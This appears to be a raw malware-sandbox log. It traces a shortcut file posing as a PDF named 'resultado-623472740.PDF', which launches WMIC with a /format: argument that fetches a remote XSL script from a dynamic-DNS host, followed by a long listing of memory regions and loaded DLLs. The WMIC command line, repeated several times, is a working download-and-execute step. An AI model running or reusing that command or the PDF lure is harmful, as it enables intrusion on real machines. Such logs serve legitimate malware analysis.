[0034.008] GetConsoleTitleW (in: lpConsoleTitle=0x311f48, nSize=0x104 | out: lpConsoleTitle="resultado-623472740.PDF") returned 0x17
[0034.008] SetConsoleTitleW (lpConsoleTitle="resultado-623472740.PDF - start /MIN C:\\Windows\\\\system32\\\\wbem\\\\WMIC.exe os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ") returned 1
[0034.010] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0034.010] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0034.010] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0034.010] _wcsicmp (_String1="MIN", _String2="HIGH") returned 5
[0034.011] _wcsicmp (_String1="MIN", _String2="LOW") returned 1
[0034.011] _wcsicmp (_String1="MIN", _String2="MIN") returned 0
[0034.011] SetErrorMode (uMode=0x0) returned 0x0
[0034.011] SetErrorMode (uMode=0x1) returned 0x0
[0034.011] GetFullPathNameW (in: lpFileName="C:\\Windows\\\\system32\\\\wbem\\\\.", nBufferLength=0x208, lpBuffer=0x311f48, lpFilePart=0x152d04 | out: lpBuffer="C:\\Windows\\system32\\wbem", lpFilePart=0x152d04*="wbem") returned 0x18
[0034.011] SetErrorMode (uMode=0x0) returned 0x1
[0034.011] NeedCurrentDirectoryForExePathW (ExeName="C:\\Windows\\\\system32\\\\wbem\\\\.") returned 1
[0034.011] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab90640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
[0034.011] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0034.011] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wbem\\WMIC.exe", fInfoLevelId=0x1, lpFindFileData=0x152aa0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x152aa0) returned 0x300ed8
[0034.012] FindClose (in: hFindFile=0x300ed8 | out: hFindFile=0x300ed8) returned 1
[0034.012] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2
[0034.012] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3
[0034.012] GetStartupInfoW (in: lpStartupInfo=0x152fb8 | out: lpStartupInfo=0x152fb8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\Desktop\\resultado-623472740.PDF.lnk", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x801, wShowWindow=0x7, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0))
[0034.012] InitializeProcThreadAttributeList (in: lpAttributeList=0x0, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x1530ac | out: lpAttributeList=0x0, lpSize=0x1530ac) returned 0
[0034.012] GetLastError () returned 0x7a
[0034.012] InitializeProcThreadAttributeList (in: lpAttributeList=0x300ed8, dwAttributeCount=0x2, dwFlags=0x0, lpSize=0x1530ac | out: lpAttributeList=0x300ed8, lpSize=0x1530ac) returned 1
[0034.012] UpdateProcThreadAttribute (in: lpAttributeList=0x300ed8, dwFlags=0x0, Attribute=0x60001, lpValue=0x153084, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x300ed8, lpPreviousValue=0x0) returned 1
[0034.012] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wbem\\WMIC.exe", lpCommandLine="C:\\Windows\\\\system32\\\\wbem\\\\WMIC.exe os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80410, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x15303c*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x7, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x3, hStdOutput=0x7, hStdError=0xb), lpProcessInformation=0x153094 | out: lpCommandLine="C:\\Windows\\\\system32\\\\wbem\\\\WMIC.exe os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" ", lpProcessInformation=0x153094*(hProcess=0x50, hThread=0x4c, dwProcessId=0x9a4, dwThreadId=0x9a8)) returned 1
[0034.104] DeleteProcThreadAttributeList (in: lpAttributeList=0x300ed8 | out: lpAttributeList=0x300ed8)
[0034.105] GetLastError () returned 0x7a
[0034.105] ResumeThread (hThread=0x4c) returned 0x0
[0034.105] CloseHandle (hObject=0x4c) returned 1
[0034.105] CloseHandle (hObject=0x50) returned 1
[0034.105] SetConsoleTitleW (lpConsoleTitle="resultado-623472740.PDF") returned 1
[0034.105] GetConsoleTitleW (in: lpConsoleTitle=0x16f56c, nSize=0x104 | out: lpConsoleTitle="resultado-623472740.PDF") returned 0x17
[0034.105] GetConsoleTitleW (in: lpConsoleTitle=0x312020, nSize=0x104 | out: lpConsoleTitle="resultado-623472740.PDF") returned 0x17
[0034.106] SetConsoleTitleW (lpConsoleTitle="exit") returned 1
[0034.106] SetConsoleTitleW (lpConsoleTitle="resultado-623472740.PDF") returned 1
[0034.107] exit (_Code=0)
Process:
id = "2"
image_name = "wmic.exe"
filename = "c:\\windows\\system32\\wbem\\wmic.exe"
page_root = "0x7f1be360"
os_pid = "0x9a4"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0x984"
cmd_line = "C:\\Windows\\\\system32\\\\wbem\\\\WMIC.exe os get Kqncmv426, lgiet286a, UUFIKrncm, numberofusers /format:\"http://bbvrsj267.dy3-nobody.com:25012/04/vv.xsl?131025012rnmcxxbrh\" "
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 170
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 171
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 172
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 173
start_va = 0xf0000
end_va = 0x12ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 174
start_va = 0x890000
end_va = 0x8f2fff
entry_point = 0x890000
region_type = mapped_file
name = "wmic.exe"
filename = "\\Windows\\System32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")
Region:
id = 175
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 176
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 177
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 178
start_va = 0x7ffd6000
end_va = 0x7ffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd6000"
filename = ""
Region:
id = 179
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 180
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 181
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 182
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 183
start_va = 0x180000
end_va = 0x18ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 184
start_va = 0x1f0000
end_va = 0x2effff
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 185
start_va = 0x6f8d0000
end_va = 0x6f904fff
entry_point = 0x6f8d0000
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 186
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 187
start_va = 0x73d70000
end_va = 0x73d8bfff
entry_point = 0x73d70000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 188
start_va = 0x73e00000
end_va = 0x73e0cfff
entry_point = 0x73e00000
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 189
start_va = 0x74f80000
end_va = 0x74f87fff
entry_point = 0x74f80000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 190
start_va = 0x74fa0000
end_va = 0x74fbafff
entry_point = 0x74fa0000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 191
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 192
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 193
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 194
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 195
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 196
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 197
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 198
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 199
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 200
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 201
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 202
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 203
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 204
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 205
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 206
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 207
start_va = 0x2f0000
end_va = 0x3b7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002f0000"
filename = ""
Region:
id = 208
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 209
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 210
start_va = 0xc0000
end_va = 0xc6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 211
start_va = 0xd0000
end_va = 0xd1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000d0000"
filename = ""
Region:
id = 212
start_va = 0xe0000
end_va = 0xeffff
entry_point = 0xe0000
region_type = mapped_file
name = "wmic.exe.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmic.exe.mui")
Region:
id = 213
start_va = 0x130000
end_va = 0x130fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 214
start_va = 0x140000
end_va = 0x140fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 215
start_va = 0x3c0000
end_va = 0x4c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003c0000"
filename = ""
Region:
id = 216
start_va = 0x900000
end_va = 0x14fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000900000"
filename = ""
Region:
id = 217
start_va = 0x190000
end_va = 0x1ebfff
entry_point = 0x190000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 218
start_va = 0x510000
end_va = 0x54ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000510000"
filename = ""
Region:
id = 219
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 220
start_va = 0x190000
end_va = 0x1ebfff
entry_point = 0x190000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 221
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 222
start_va = 0x570000
end_va = 0x5affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 223
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 224
start_va = 0x150000
end_va = 0x150fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000150000"
filename = ""
Region:
id = 225
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 226
start_va = 0x160000
end_va = 0x160fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000160000"
filename = ""
Region:
id = 227
start_va = 0x6e580000
end_va = 0x6e589fff
entry_point = 0x6e580000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 228
start_va = 0x6e780000
end_va = 0x6e7dbfff
entry_point = 0x6e780000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 229
start_va = 0x5b0000
end_va = 0x66ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005b0000"
filename = ""
Region:
id = 230
start_va = 0x1500000
end_va = 0x17cefff
entry_point = 0x1500000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 231
start_va = 0x6d350000
end_va = 0x6d482fff
entry_point = 0x6d350000
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 232
start_va = 0x5b0000
end_va = 0x61ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000005b0000"
filename = ""
Region:
id = 233
start_va = 0x630000
end_va = 0x66ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 234
start_va = 0x670000
end_va = 0x7cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 235
start_va = 0x17d0000
end_va = 0x19bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000017d0000"
filename = ""
Region:
id = 236
start_va = 0x17d0000
end_va = 0x193ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000017d0000"
filename = ""
Region:
id = 237
start_va = 0x1980000
end_va = 0x19bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001980000"
filename = ""
Region:
id = 238
start_va = 0x19c0000
end_va = 0x1baffff
entry_point = 0x0
region_type = private
name = "private_0x00000000019c0000"
filename = ""
Region:
id = 239
start_va = 0x670000
end_va = 0x78ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000670000"
filename = ""
Region:
id = 240
start_va = 0x790000
end_va = 0x7cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000790000"
filename = ""
Region:
id = 241
start_va = 0x19c0000
end_va = 0x1b3ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000019c0000"
filename = ""
Region:
id = 242
start_va = 0x1b70000
end_va = 0x1baffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b70000"
filename = ""
Region:
id = 243
start_va = 0x670000
end_va = 0x72ffff
entry_point = 0x670000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 244
start_va = 0x750000
end_va = 0x78ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000750000"
filename = ""
Region:
id = 245
start_va = 0x1bb0000
end_va = 0x1faffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001bb0000"
filename = ""
Region:
id = 246
start_va = 0x170000
end_va = 0x170fff
entry_point = 0x170000
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")
Region:
id = 247
start_va = 0x190000
end_va = 0x1affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000190000"
filename = ""
Region:
id = 248
start_va = 0x75a80000
end_va = 0x75bb5fff
entry_point = 0x75a80000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 249
start_va = 0x76920000
end_va = 0x76a14fff
entry_point = 0x76920000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 250
start_va = 0x754c0000
end_va = 0x756bafff
entry_point = 0x754c0000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 251
start_va = 0x751b0000
end_va = 0x752ccfff
entry_point = 0x751b0000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 252
start_va = 0x750e0000
end_va = 0x750ebfff
entry_point = 0x750e0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 253
start_va = 0x17d0000
end_va = 0x18cffff
entry_point = 0x0
region_type = private
name = "private_0x00000000017d0000"
filename = ""
Region:
id = 254
start_va = 0x1900000
end_va = 0x193ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001900000"
filename = ""
Region:
id = 255
start_va = 0x1b0000
end_va = 0x1b1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001b0000"
filename = ""
Region:
id = 256
start_va = 0x73e90000
end_va = 0x7402dfff
entry_point = 0x73e90000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll")
Region:
id = 257
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x1c0000
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 258
start_va = 0x1d0000
end_va = 0x1d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 259
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 260
start_va = 0x1c0000
end_va = 0x1c0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001c0000"
filename = ""
Region:
id = 261
start_va = 0x75070000
end_va = 0x7507afff
entry_point = 0x75070000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 262
start_va = 0x4d0000
end_va = 0x4fbfff
entry_point = 0x4d0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 263
start_va = 0x1e0000
end_va = 0x1e7fff
entry_point = 0x1e0000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 264
start_va = 0x500000
end_va = 0x50ffff
entry_point = 0x500000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\eebsym5\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 265
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 266
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 267
start_va = 0x749c0000
end_va = 0x74a03fff
entry_point = 0x749c0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 268
start_va = 0x19c0000
end_va = 0x1aeffff
entry_point = 0x0
region_type = private
name = "private_0x00000000019c0000"
filename = ""
Region:
id = 269
start_va = 0x1b00000
end_va = 0x1b3ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001b00000"
filename = ""
Region:
id = 270
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 271
start_va = 0x1fb0000
end_va = 0x20effff
entry_point = 0x0
region_type = private
name = "private_0x0000000001fb0000"
filename = ""
Region:
id = 272
start_va = 0x19c0000
end_va = 0x1a9efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000019c0000"
filename = ""
Region:
id = 273
start_va = 0x1ab0000
end_va = 0x1aeffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ab0000"
filename = ""
Region:
id = 274
start_va = 0x1ff0000
end_va = 0x202ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001ff0000"
filename = ""
Region:
id = 275
start_va = 0x20b0000
end_va = 0x20effff
entry_point = 0x0
region_type = private
name = "private_0x00000000020b0000"
filename = ""
Region:
id = 276
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 277
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 278
start_va = 0x7d0000
end_va = 0x80bfff
entry_point = 0x7d0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 279
start_va = 0x7d0000
end_va = 0x80bfff
entry_point = 0x7d0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 280
start_va = 0x7d0000
end_va = 0x80bfff
entry_point = 0x7d0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 281
start_va = 0x7d0000
end_va = 0x80bfff
entry_point = 0x7d0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 282
start_va = 0x7d0000
end_va = 0x80bfff
entry_point = 0x7d0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 283
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 284
